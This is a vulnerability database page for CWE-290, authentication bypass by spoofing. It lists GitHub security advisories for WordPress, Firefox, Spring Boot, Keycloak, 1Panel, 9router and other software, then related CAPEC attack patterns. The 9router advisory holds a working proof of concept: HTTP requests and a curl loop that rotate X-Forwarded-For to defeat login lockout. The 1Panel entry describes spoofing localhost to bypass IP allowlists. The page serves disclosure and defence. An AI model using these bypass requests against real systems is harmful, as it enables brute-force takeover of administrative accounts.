CWE-290
AllowedAuthentication Bypass by Spoofing
Abstraction: Base · Status: Incomplete
This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.
927 vulnerabilities reference this CWE, most recent first.
GHSA-78XV-3XPM-3HCQ
Vulnerability from github – Published: 2022-06-14 00:00 – Updated: 2022-06-22 00:00The iQ Block Country WordPress plugin through 1.2.13 does not properly checks HTTP headers in order to validate the origin IP address, allowing threat actors to bypass it's block feature by spoofing the headers.
{
"affected": [],
"aliases": [
"CVE-2022-1762"
],
"database_specific": {
"cwe_ids": [
"CWE-290",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-13T13:15:00Z",
"severity": "HIGH"
},
"details": "The iQ Block Country WordPress plugin through 1.2.13 does not properly checks HTTP headers in order to validate the origin IP address, allowing threat actors to bypass it\u0027s block feature by spoofing the headers.",
"id": "GHSA-78xv-3xpm-3hcq",
"modified": "2022-06-22T00:00:52Z",
"published": "2022-06-14T00:00:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1762"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/03254977-37cc-4365-979b-326f9637be85"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-798H-6RGP-73QQ
Vulnerability from github – Published: 2023-11-22 12:30 – Updated: 2023-11-22 12:30Authentication bypass vulnerability, the exploitation of which could allow a local attacker to perform a Man-in-the-Middle (MITM) attack on the robot's camera video stream. In addition, if a MITM attack is carried out, it is possible to consume the robot's resources, which could lead to a denial-of-service (DOS) condition.
{
"affected": [],
"aliases": [
"CVE-2023-3103"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-22T12:15:22Z",
"severity": "HIGH"
},
"details": "Authentication bypass vulnerability, the exploitation of which could allow a local attacker to perform a Man-in-the-Middle (MITM) attack on the robot\u0027s camera video stream. In addition, if a MITM attack is carried out, it is possible to consume the robot\u0027s resources, which could lead to a denial-of-service (DOS) condition.",
"id": "GHSA-798h-6rgp-73qq",
"modified": "2023-11-22T12:30:26Z",
"published": "2023-11-22T12:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3103"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-unitree-robotics-a1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-799G-3G44-3G9M
Vulnerability from github – Published: 2025-04-01 15:31 – Updated: 2025-11-03 21:33A crafted URL containing specific Unicode characters could have hidden the true origin of the page, resulting in a potential spoofing attack. This vulnerability affects Firefox < 137, Firefox ESR < 128.9, Thunderbird < 137, and Thunderbird ESR < 128.9.
{
"affected": [],
"aliases": [
"CVE-2025-3029"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-01T13:15:41Z",
"severity": "HIGH"
},
"details": "A crafted URL containing specific Unicode characters could have hidden the true origin of the page, resulting in a potential spoofing attack. This vulnerability affects Firefox \u003c 137, Firefox ESR \u003c 128.9, Thunderbird \u003c 137, and Thunderbird ESR \u003c 128.9.",
"id": "GHSA-799g-3g44-3g9m",
"modified": "2025-11-03T21:33:20Z",
"published": "2025-04-01T15:31:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3029"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1952213"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00005.html"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2025-20"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2025-22"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2025-23"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2025-24"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-7CFM-PQRJ-XGQ7
Vulnerability from github – Published: 2026-07-06 21:46 – Updated: 2026-07-06 21:46Summary
The 9router dashboard login rate limiter derives the client identity from the attacker-controlled X-Forwarded-For HTTP header. When 9router is directly exposed, or deployed behind a reverse proxy that does not overwrite untrusted forwarding headers, a remote attacker can rotate the X-Forwarded-For value on each login attempt and receive a fresh rate-limit bucket every time.
This bypasses the dashboard brute-force protection and makes the login lockout mechanism ineffective.
Details
| Component | File | Note |
|---|---|---|
| Dashboard login rate limiter | src/lib/auth/loginLimiter.js |
Uses X-Forwarded-For as the client identity without a trusted-proxy check |
| Dashboard login route | src/app/api/auth/login/route.js |
Calls checkLock() and recordFail() using the spoofable client identity |
Vulnerable Code
src/lib/auth/loginLimiter.js:
export function getClientIp(request) {
const xff = request.headers.get("x-forwarded-for");
if (xff) return xff.split(",")[0].trim();
return request.headers.get("x-real-ip") || "unknown";
}
The returned value is used as the key for the in-memory rate-limit state:
const attempts = new Map(); // ip -> { fails, lockUntil, lockLevel, lastFailAt }
The login route uses this value when checking and recording failed login attempts:
export async function POST(request) {
const ip = getClientIp(request);
const lock = checkLock(ip);
if (lock.locked) {
return NextResponse.json(
{ error: `Too many failed attempts. Try again in ${lock.retryAfter}s.` },
{ status: 429 }
);
}
// ... password validation ...
recordFail(ip);
}
Because X-Forwarded-For is accepted directly from the request, each unique header value creates a new rate-limit bucket with zero previous failures. An attacker can therefore bypass both the 5-attempt threshold and the progressive lockout durations.
PoC
Step 1 — Baseline: rate limiter triggers when the client identity is stable
Send repeated failed login attempts with the same X-Forwarded-For value:
POST /api/auth/login HTTP/1.1
Host: localhost:20128
Content-Type: application/json
X-Forwarded-For: 1.1.1.1
{"password":"wrong-password"}
Observed behavior:
| Attempt | Response |
|---|---|
| 1 | Invalid password. 4 attempt(s) left before lockout. |
| 2 | Invalid password. 3 attempt(s) left before lockout. |
| 3 | Invalid password. 2 attempt(s) left before lockout. |
| 4 | Invalid password. 1 attempt(s) left before lockout. |
| 5 | Too many failed attempts. Try again in 30s. |
| 6 | Too many failed attempts. Try again in 30s. |
This confirms that the lockout logic works when all attempts are assigned to the same rate-limit bucket.
Step 2 — Bypass: rotate X-Forwarded-For on each request
Send failed login attempts while changing the X-Forwarded-For value for every request:
for i in $(seq 1 10); do
curl -s -X POST "http://localhost:20128/api/auth/login" \
-H "Content-Type: application/json" \
-H "X-Forwarded-For: 10.0.0.$i" \
-d '{"password":"wrong-password"}'
echo
done
Observed response for every request:
{
"error": "Invalid password. 4 attempt(s) left before lockout.",
"remainingBeforeLock": 4
}
The counter resets to the initial state on every request, and the lockout is never triggered.
Step 3 — Impact amplifier: default dashboard password
If the instance is still using the default dashboard password, the rate-limit bypass allows an attacker to avoid lockout while attempting to authenticate.
Example request:
POST /api/auth/login HTTP/1.1
Host: localhost:20128
Content-Type: application/json
X-Forwarded-For: 99.99.99.99
{"password":"<default-dashboard-password>"}
Observed response on a default installation:
HTTP/1.1 200 OK
Set-Cookie: auth_token=<redacted>; Path=/; HttpOnly; SameSite=lax
{
"success": true
}
The default password is an impact amplifier, not the root cause. Even if an administrator changes the password, the rate limiter remains structurally bypassable because the attacker controls the rate-limit key.
Attack Scenario
- A remote attacker identifies a publicly reachable 9router dashboard.
- The attacker sends repeated login attempts to
/api/auth/login. - For each attempt, the attacker changes the
X-Forwarded-Forheader value. - 9router treats each request as a different client and assigns a fresh rate-limit bucket.
- The attacker can continue brute-force attempts without triggering the configured lockout.
- If the instance uses a weak or default dashboard password, the attacker can gain administrative access.
Impact
A successful attacker can bypass the dashboard login lockout mechanism and perform unlimited brute-force attempts against the 9router dashboard password.
If authentication succeeds, the attacker can gain administrative access to the 9router dashboard and may be able to:
- Access configured provider credentials and API keys.
- Change dashboard and authentication settings.
- Disable login protection if the application allows it.
- Create persistent API keys or other long-lived access tokens.
- Modify application configuration.
- Chain the access with other server-side functionality exposed by the dashboard.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.4.71"
},
"package": {
"ecosystem": "npm",
"name": "9router"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.4.77"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55501"
],
"database_specific": {
"cwe_ids": [
"CWE-290",
"CWE-307"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-06T21:46:20Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nThe 9router dashboard login rate limiter derives the client identity from the attacker-controlled `X-Forwarded-For` HTTP header. When 9router is directly exposed, or deployed behind a reverse proxy that does not overwrite untrusted forwarding headers, a remote attacker can rotate the `X-Forwarded-For` value on each login attempt and receive a fresh rate-limit bucket every time.\n\nThis bypasses the dashboard brute-force protection and makes the login lockout mechanism ineffective.\n\n## Details\n\n| Component | File | Note |\n| ---------------------------- | --------------------------------- | --------------------------------------------------------------------------- |\n| Dashboard login rate limiter | `src/lib/auth/loginLimiter.js` | Uses `X-Forwarded-For` as the client identity without a trusted-proxy check |\n| Dashboard login route | `src/app/api/auth/login/route.js` | Calls `checkLock()` and `recordFail()` using the spoofable client identity |\n\n#### Vulnerable Code\n\n`src/lib/auth/loginLimiter.js`:\n\n```js\nexport function getClientIp(request) {\n const xff = request.headers.get(\"x-forwarded-for\");\n if (xff) return xff.split(\",\")[0].trim();\n return request.headers.get(\"x-real-ip\") || \"unknown\";\n}\n```\n\nThe returned value is used as the key for the in-memory rate-limit state:\n\n```js\nconst attempts = new Map(); // ip -\u003e { fails, lockUntil, lockLevel, lastFailAt }\n```\n\nThe login route uses this value when checking and recording failed login attempts:\n\n```js\nexport async function POST(request) {\n const ip = getClientIp(request);\n const lock = checkLock(ip);\n\n if (lock.locked) {\n return NextResponse.json(\n { error: `Too many failed attempts. Try again in ${lock.retryAfter}s.` },\n { status: 429 }\n );\n }\n\n // ... password validation ...\n\n recordFail(ip);\n}\n```\n\nBecause `X-Forwarded-For` is accepted directly from the request, each unique header value creates a new rate-limit bucket with zero previous failures. An attacker can therefore bypass both the 5-attempt threshold and the progressive lockout durations.\n\n## PoC\n\n### Step 1 \u2014 Baseline: rate limiter triggers when the client identity is stable\n\nSend repeated failed login attempts with the same `X-Forwarded-For` value:\n\n```http\nPOST /api/auth/login HTTP/1.1\nHost: localhost:20128\nContent-Type: application/json\nX-Forwarded-For: 1.1.1.1\n\n{\"password\":\"wrong-password\"}\n```\n\nObserved behavior:\n\n| Attempt | Response |\n| ------- | ----------------------------------------------------- |\n| 1 | `Invalid password. 4 attempt(s) left before lockout.` |\n| 2 | `Invalid password. 3 attempt(s) left before lockout.` |\n| 3 | `Invalid password. 2 attempt(s) left before lockout.` |\n| 4 | `Invalid password. 1 attempt(s) left before lockout.` |\n| 5 | `Too many failed attempts. Try again in 30s.` |\n| 6 | `Too many failed attempts. Try again in 30s.` |\n\nThis confirms that the lockout logic works when all attempts are assigned to the same rate-limit bucket.\n\n### Step 2 \u2014 Bypass: rotate `X-Forwarded-For` on each request\n\nSend failed login attempts while changing the `X-Forwarded-For` value for every request:\n\n```bash\nfor i in $(seq 1 10); do\n curl -s -X POST \"http://localhost:20128/api/auth/login\" \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Forwarded-For: 10.0.0.$i\" \\\n -d \u0027{\"password\":\"wrong-password\"}\u0027\n echo\ndone\n```\n\nObserved response for every request:\n\n```json\n{\n \"error\": \"Invalid password. 4 attempt(s) left before lockout.\",\n \"remainingBeforeLock\": 4\n}\n```\n\nThe counter resets to the initial state on every request, and the lockout is never triggered.\n\n### Step 3 \u2014 Impact amplifier: default dashboard password\n\nIf the instance is still using the default dashboard password, the rate-limit bypass allows an attacker to avoid lockout while attempting to authenticate.\n\nExample request:\n\n```http\nPOST /api/auth/login HTTP/1.1\nHost: localhost:20128\nContent-Type: application/json\nX-Forwarded-For: 99.99.99.99\n\n{\"password\":\"\u003cdefault-dashboard-password\u003e\"}\n```\n\nObserved response on a default installation:\n\n```http\nHTTP/1.1 200 OK\nSet-Cookie: auth_token=\u003credacted\u003e; Path=/; HttpOnly; SameSite=lax\n```\n\n```json\n{\n \"success\": true\n}\n```\n\nThe default password is an impact amplifier, not the root cause. Even if an administrator changes the password, the rate limiter remains structurally bypassable because the attacker controls the rate-limit key.\n\n## Attack Scenario\n\n1. A remote attacker identifies a publicly reachable 9router dashboard.\n2. The attacker sends repeated login attempts to `/api/auth/login`.\n3. For each attempt, the attacker changes the `X-Forwarded-For` header value.\n4. 9router treats each request as a different client and assigns a fresh rate-limit bucket.\n5. The attacker can continue brute-force attempts without triggering the configured lockout.\n6. If the instance uses a weak or default dashboard password, the attacker can gain administrative access.\n\n## Impact\n\nA successful attacker can bypass the dashboard login lockout mechanism and perform unlimited brute-force attempts against the 9router dashboard password.\n\nIf authentication succeeds, the attacker can gain administrative access to the 9router dashboard and may be able to:\n\n* Access configured provider credentials and API keys.\n* Change dashboard and authentication settings.\n* Disable login protection if the application allows it.\n* Create persistent API keys or other long-lived access tokens.\n* Modify application configuration.\n* Chain the access with other server-side functionality exposed by the dashboard.",
"id": "GHSA-7cfm-pqrj-xgq7",
"modified": "2026-07-06T21:46:20Z",
"published": "2026-07-06T21:46:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/decolua/9router/security/advisories/GHSA-7cfm-pqrj-xgq7"
},
{
"type": "PACKAGE",
"url": "https://github.com/decolua/9router"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "9router: Login brute-force protection bypass via spoofed X-Forwarded-For header"
}
GHSA-7CJ3-X93G-GJ76
Vulnerability from github – Published: 2024-08-23 09:30 – Updated: 2025-03-27 23:38Applications that use spring-boot-loader or spring-boot-loader-classic and contain custom code that performs signature verification of nested jar files may be vulnerable to signature forgery where content that appears to have been signed by one signer has, in fact, been signed by another.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.7.21"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.22"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.7.21"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader-classic"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.22"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.16"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.16"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader-classic"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.12"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0"
},
{
"fixed": "3.1.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.12"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader-classic"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0"
},
{
"fixed": "3.1.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.8"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0"
},
{
"fixed": "3.2.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.8"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader-classic"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0"
},
{
"fixed": "3.2.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.3.2"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.3.2"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework.boot:spring-boot-loader-classic"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-38807"
],
"database_specific": {
"cwe_ids": [
"CWE-290",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-23T18:52:45Z",
"nvd_published_at": "2024-08-23T09:15:07Z",
"severity": "HIGH"
},
"details": "Applications that use spring-boot-loader\u00a0or spring-boot-loader-classic\u00a0and contain custom code that performs signature verification of nested jar files may be vulnerable to signature forgery where content that appears to have been signed by one signer has, in fact, been signed by another.",
"id": "GHSA-7cj3-x93g-gj76",
"modified": "2025-03-27T23:38:50Z",
"published": "2024-08-23T09:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38807"
},
{
"type": "PACKAGE",
"url": "https://github.com/spring-projects/spring-boot"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250117-0006"
},
{
"type": "WEB",
"url": "https://spring.io/security/cve-2024-38807"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Signature forgery in Spring Boot\u0027s Loader"
}
GHSA-7CQV-QCQ2-R765
Vulnerability from github – Published: 2025-12-08 17:56 – Updated: 2025-12-17 00:47Summary
The server trusts all reverse-proxy headers by default, so any remote client can spoof X-Forwarded-For to bypass IP-based protections (AllowIPs, API IP whitelist, “localhost-only” checks). All IP-based access control becomes ineffective.
Details
-
Gin is created with defaults (
gin.Default()), which setsTrustedProxies = 0.0.0.0/0and usesX-Forwarded-For/X-Real-IPto computeClientIP(). -
IP-based controls rely on
ClientIP():- AllowIPs / BindDomain (core/middleware/ip_limit.go, core/utils/security/security.go).
- API IP whitelist (core/middleware/api_auth.go).
- "localhost-only" checks that depend on
ClientIP().
-
Because no trusted-proxy range is enforced, any client can send
X-Forwarded-For: 127.0.0.1(or a whitelisted IP) and be treated as coming from that address.
Impact
All IP-based access control is rendered ineffective: remote clients can masquerade as localhost or any whitelisted IP, defeating AllowIPs, API IP whitelists, and “localhost-only” protections.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/1Panel-dev/1Panel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/1Panel-dev/1Panel/agent"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20251201063338-94f7d78cc976"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66508"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-08T17:56:57Z",
"nvd_published_at": "2025-12-09T16:18:19Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe server trusts all reverse-proxy headers by default, so any remote client can spoof `X-Forwarded-For` to bypass IP-based protections (AllowIPs, API IP whitelist, \u201clocalhost-only\u201d checks). All IP-based access control becomes ineffective.\n\n### Details\n- Gin is created with defaults (`gin.Default()`), which sets `TrustedProxies = 0.0.0.0/0` and uses `X-Forwarded-For`/`X-Real-IP` to compute `ClientIP()`.\n\n- IP-based controls rely on `ClientIP()`:\n - AllowIPs / BindDomain (core/middleware/ip_limit.go, core/utils/security/security.go).\n - API IP whitelist (core/middleware/api_auth.go).\n - \"localhost-only\" checks that depend on `ClientIP()`.\n\n- Because no trusted-proxy range is enforced, any client can send `X-Forwarded-For: 127.0.0.1` (or a whitelisted IP) and be treated as coming from that address.\n\n### Impact\nAll IP-based access control is rendered ineffective: remote clients can masquerade as localhost or any whitelisted IP, defeating AllowIPs, API IP whitelists, and \u201clocalhost-only\u201d protections.",
"id": "GHSA-7cqv-qcq2-r765",
"modified": "2025-12-17T00:47:24Z",
"published": "2025-12-08T17:56:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7cqv-qcq2-r765"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66508"
},
{
"type": "WEB",
"url": "https://github.com/1Panel-dev/1Panel/commit/94f7d78cc9768ee244da33e09408017d1f68b5ed"
},
{
"type": "PACKAGE",
"url": "https://github.com/1Panel-dev/1Panel"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "1Panel IP Access Control Bypass via Untrusted X-Forwarded-For Headers"
}
GHSA-7F47-Q24V-32RC
Vulnerability from github – Published: 2026-05-19 15:31 – Updated: 2026-05-19 18:32Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151.
{
"affected": [],
"aliases": [
"CVE-2026-8963"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-19T14:16:52Z",
"severity": "HIGH"
},
"details": "Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151.",
"id": "GHSA-7f47-q24v-32rc",
"modified": "2026-05-19T18:32:09Z",
"published": "2026-05-19T15:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8963"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2021222"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2026-46"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2026-50"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7F8G-XQPJ-293G
Vulnerability from github – Published: 2022-02-11 00:01 – Updated: 2023-12-28 00:30Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-43242.
{
"affected": [],
"aliases": [
"CVE-2021-42320"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-15T15:15:00Z",
"severity": "LOW"
},
"details": "Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-43242.",
"id": "GHSA-7f8g-xqpj-293g",
"modified": "2023-12-28T00:30:19Z",
"published": "2022-02-11T00:01:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42320"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42320"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7FPJ-9HR8-28VH
Vulnerability from github – Published: 2024-04-17 18:25 – Updated: 2024-11-18 17:28Keycloak was found to not properly enforce token types when validating signatures locally. An authenticated attacker could use this flaw to exchange a logout token for an access token and possibly gain access to data outside of enforced permissions.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-services"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "22.0.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-services"
},
"ranges": [
{
"events": [
{
"introduced": "23.0.0"
},
{
"fixed": "24.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-0657"
],
"database_specific": {
"cwe_ids": [
"CWE-273",
"CWE-284",
"CWE-287",
"CWE-290",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-17T18:25:59Z",
"nvd_published_at": "2024-11-17T11:15:05Z",
"severity": "LOW"
},
"details": "Keycloak was found to not properly enforce token types when validating signatures locally. An authenticated attacker could use this flaw to exchange a logout token for an access token and possibly gain access to data outside of enforced permissions.\n\n",
"id": "GHSA-7fpj-9hr8-28vh",
"modified": "2024-11-18T17:28:39Z",
"published": "2024-04-17T18:25:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-7fpj-9hr8-28vh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0657"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1867"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1868"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2023-0657"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2166728"
},
{
"type": "PACKAGE",
"url": "https://github.com/keycloak/keycloak"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keycloak vulnerable to impersonation via logout token exchange"
}
GHSA-7FPW-CFC4-3P2C
Vulnerability from github – Published: 2017-12-28 22:51 – Updated: 2023-06-21 22:00Duplicate advisory
This advisory has been withdrawn because it is a duplicate of GHSA-77fw-rf4v-vfp9. This link is maintained to preserve external references.
Original Description
A vulnerability has been discovered in the Auth0 passport-wsfed-saml2 library affecting versions < 3.0.5. This vulnerability allows an attacker to impersonate another user and potentially elevate their privileges if the SAML identity provider does not sign the full SAML response (e.g., only signs the assertion within the response).
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "passport-wsfed-saml2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:22:38Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Duplicate advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-77fw-rf4v-vfp9. This link is maintained to preserve external references.\n\n## Original Description\nA vulnerability has been discovered in the Auth0 passport-wsfed-saml2 library affecting versions \u003c 3.0.5. This vulnerability allows an attacker to impersonate another user and potentially elevate their privileges if the SAML identity provider does not sign the full SAML response (e.g., only signs the assertion within the response).",
"id": "GHSA-7fpw-cfc4-3p2c",
"modified": "2023-06-21T22:00:08Z",
"published": "2017-12-28T22:51:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16897"
},
{
"type": "WEB",
"url": "https://auth0.com/docs/security/bulletins/cve-2017-16897"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-7fpw-cfc4-3p2c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Duplicate advisory: High severity vulnerability that affects passport-wsfed-saml2",
"withdrawn": "2023-06-21T22:00:08Z"
}
No mitigation information available for this CWE.
CAPEC-21: Exploitation of Trusted Identifiers
An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-459: Creating a Rogue Certification Authority Certificate
